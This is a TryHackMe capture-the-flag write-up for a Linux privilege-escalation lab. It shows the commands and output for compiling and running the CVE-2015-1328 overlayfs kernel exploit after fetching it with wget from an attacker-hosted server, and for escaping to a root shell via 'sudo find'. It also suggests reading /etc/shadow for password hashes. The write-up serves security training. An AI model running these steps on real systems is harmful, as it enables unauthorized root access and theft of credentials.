Note: Each part is different machine, so if you complete a task, stop old machine and start new machine on new task.
Link: https://tryhackme.com/room/linprivesc
$ uname -a
Linux wade7363 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
CVE-2015-1328 PoC: https://www.exploit-db.com/exploits/37292
How to do that in your machine:
python3 -m http.server 8000In victim machine:
$ cd /tmp
$ wget <http://10.4.126.108/poc.c>
$ gcc poc.c -o poc
$ id
uid=1001(karen) gid=1001(karen) groups=1001(karen)
$ ./poc
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(karen)
# cat /home/matt/flag1.txt
???
As always, use sudo -l to check if any binaries can execute as sudo
$ sudo -l
Matching Defaults entries for karen on ip-10-10-54-112:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User karen may run the following commands on ip-10-10-54-112:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nano
In this solution, I use find. You can use less or nano, as your choice
Go to https://gtfobins.github.io/gtfobins/find/#sudo and copy command:
$ sudo find . -exec /bin/sh \\; -quit
# id
uid=0(root) gid=0(root) groups=0(root)
You are root user now~ flag2.txt located on /home/ubuntu/flag2.txt
To answer question about nmap, go to GTFOBins again and find nmap. Link: https://gtfobins.github.io/gtfobins/nmap/#sudo
You can also read /etc/shadow to find hash of all user accounts.